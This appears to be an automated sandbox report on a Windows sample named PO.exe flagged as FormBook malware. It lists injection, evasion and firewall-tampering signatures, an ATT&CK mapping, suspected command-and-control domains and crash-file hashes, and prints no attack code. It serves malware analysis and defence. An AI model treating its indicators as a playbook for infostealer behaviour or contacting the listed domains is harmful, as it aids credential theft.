          Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Users\user\Desktop\PO.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.314545610.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.484649434.00000000031B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.483269971.0000000002E50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.314657268.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.483171472.0000000002DB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection412Rootkit1Credential API Hooking1Security Software Discovery231Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Modify Registry1LSASS MemoryVirtualization/Sandbox Evasion13Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion13Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection412LSA SecretsSystem Information Discovery122SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321086 Sample: PO.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 35 www.flexultralounge.com 2->35 37 blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com 2->37 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 4 other signatures 2->47 11 PO.exe 2 2->11         started        signatures3 process4 signatures5 55 Tries to detect virtualization through RDTSC time measurements 11->55 57 Hides threads from debuggers 11->57 14 PO.exe 11->14         started        17 WerFault.exe 24 9 11->17         started        process6 dnsIp7 59 Modifies the context of a thread in another process (thread injection) 14->59 61 Maps a DLL or memory area into another process 14->61 63 Sample uses process hollowing technique 14->63 65 Queues an APC in another process (thread injection) 14->65 21 explorer.exe 14->21 injected 33 192.168.2.1 unknown unknown 17->33 31 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 17->31 dropped file8 signatures9 process10 dnsIp11 39 www.novavitarealty.com 21->39 24 netsh.exe 21->24         started        process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 24->49 51 Maps a DLL or memory area into another process 24->51 53 Tries to detect virtualization through RDTSC time measurements 24->53 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO.exe39%VirustotalBrowse
          PO.exe10%ReversingLabs
          PO.exe100%AviraTR/Injector.eajju
          PO.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.PO.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

          Domains

          SourceDetectionScannerLabelLink
          www.flexultralounge.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://crl.v0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          blooming-guava-cawr4blrtfppsz67r0r2wz0v.herokudns.com
          		34.232.47.250
          		truefalse
            		unknown
            www.novavitarealty.com
            		unknown
            		unknowntrue
              		unknown
              www.flexultralounge.com
              		unknown
              		unknowntrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.comexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designers/?explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                        		high
                        https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.cssnetsh.exe, 00000010.00000002.491969634.000000000432F000.00000004.00000001.sdmpfalse
                          		high
                          http://www.tiro.comexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                            		high
                            http://www.goodfont.co.krexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comlexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cnexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers8explorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fonts.comexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sakkal.comexplorer.exe, 00000006.00000000.288649915.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://crl.vexplorer.exe, 00000006.00000002.484389821.0000000001398000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious

                                    Private

                                    IP
                                    192.168.2.1

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:321086
                                    Start date:20.11.2020
                                    Start time:10:59:15
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 44s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:PO.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:28
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@8/4@2/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 29.7% (good quality ratio 26.3%)
                                    • Quality average: 72.7%
                                    • Quality standard deviation: 32.4%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 53
                                    • Number of non-executed functions: 134
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.193.48, 23.210.248.85, 51.104.139.180, 8.248.121.254, 8.241.11.126, 67.26.83.254, 8.241.9.126, 8.248.113.254, 52.155.217.156, 20.54.26.129, 95.101.22.134, 95.101.22.125
                                    • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, umwatsonrouting.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    11:00:38API Interceptor1x Sleep call for process: WerFault.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASN

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PO.exe_501eda88e083e4b8ea75a1ac83a7c11b0f8b4_f9ae678b_1136dfa8\Report.wer
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):14094
                                    Entropy (8bit):3.7695922857449777
                                    Encrypted:false
                                    SSDEEP:192:pigwqmHBUZMXCaKKYKd9/u7sFS274ItI/:m7BUZMXCad9/u7sFX4ItI/
                                    MD5:D77377036B2D229A28FD4B25F0044C71
                                    SHA1:52D3B8CE5C9ACBEB6F4F0920D840AA10105B2BCA
                                    SHA-256:A157F350D251B06DEF44269C215FD29D559D99C65D617D99A96301288122A534
                                    SHA-512:904701C489605A0C4736E45BFED1CC00394C8DDA7D7EAA7DFCCBF73489850563BA7BA88E51A7508A7C1AF9511CAC9327EA80F02A7BF2F4B8AB1874322B2CC7C2
                                    Malicious:true
                                    Reputation:low
                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.3.7.2.4.3.5.0.7.6.9.0.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.3.7.2.4.3.6.4.8.3.1.5.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.b.1.e.c.7.8.-.2.5.8.b.-.4.d.2.e.-.8.e.d.d.-.d.a.9.c.c.e.9.7.3.8.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.1.9.9.3.2.e.-.8.4.b.7.-.4.5.b.3.-.a.d.2.f.-.f.7.a.6.3.0.4.c.4.2.f.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.f.8.-.0.0.0.1.-.0.0.1.7.-.b.5.7.c.-.6.0.5.e.6.f.b.f.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.1.5.5.8.2.5.8.1.7.f.b.3.c.a.1.d.e.4.7.3.6.2.b.f.7.d.2.2.7.6.e.0.0.0.0.f.f.f.f.!.0.0.0.0.5.0.b.e.e.b.d.3.3.a.8.b.6.8.6.0.2.6.3.2.e.1.e.c.0.6.5.c.c.6.e.3.b.7.0.b.4.0.e.a.!.P.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.
                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2F6.tmp.dmp
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 14 streams, Fri Nov 20 19:00:35 2020, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):241083
                                    Entropy (8bit):3.943938856250719
                                    Encrypted:false
                                    SSDEEP:3072:+90FUCgUdQjOJsR0Zjd+p+EeYE18oe9gIOgF5L2:AmTj160OpIYlf9RpDC
                                    MD5:6CDBA3737AB2EFAD72CCC19F1C0466BC
                                    SHA1:FB09AC375E482B6916422B243BDFDFBF7076E35F
                                    SHA-256:4B617196F7F20BE5F6551F2478B4E11C3491789CA047C324E145563267B949E0
                                    SHA-512:4069D5F9D62486F5057EB95155C7C1AAFE70AB0F1DD801555A4F9ADB8AA4EC929BFF42A6B7A965949C9DE401D786833947271F94894F32B4A4FC3E2436E11327
                                    Malicious:false
                                    Reputation:low
                                    Preview: MDMP....... .......S.._...................U...........B.......#......GenuineIntelW...........T...........9.._.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD73D.tmp.WERInternalMetadata.xml
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8376
                                    Entropy (8bit):3.69264885519139
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNiHa6A/6YSvSUZ2YTgmfZlSjCprR389b9vsf2fm:RrlsNi66A/6Y6SUZ20gmfrSgo9Uf/
                                    MD5:A73C345620533EB3DE4FE45689A7A1C7
                                    SHA1:43E861C1A038FF6EB5DC382876BB7BAE2FE5ADFB
                                    SHA-256:0AD12BBDA211A7FD2C51F4189CDB84CF223BD5F4977F37E8DDA7411B3A60A803
                                    SHA-512:4DD6D27F349DADE56F291D80112D700336468C0E0CC266888F95B39CB9A460DF42838D91E148F9C9E73F9372C867A4FA6EDD506B99982005A895F917DBEB52AD
                                    Malicious:false
                                    Reputation:low
                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.0.6.4.<./.P.i.d.>.......
                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD809.tmp.xml
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4645
                                    Entropy (8bit):4.446423142087213
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zsIJgtWI9yiVhWSC8Bu8fm8M4Jw0RFFgt+q8vARxYNUZCqvBL6d:uITfO5imSNlJw5KsYOvBL6d
                                    MD5:2C42EEB13CBB3E68A1ECA68B67CFA1BA
                                    SHA1:869D79D69054BCB04B98A69DD4D05970B310CF3B
                                    SHA-256:4E7957DE3EFE71E934F817E1CDA120347C1188ACEE25B6412B299706763E135B
                                    SHA-512:04D94FA3F1873C7195B4750512CD1B4A1651A8F6FF106EFBA732900F1225B6C3C4D670FB39814C21C94DBF350EB2B8461AED2241A0024640A34F6A000CE85610
                                    Malicious:false
                                    Reputation:low
                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="737531" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                    Static File Info

                                    General

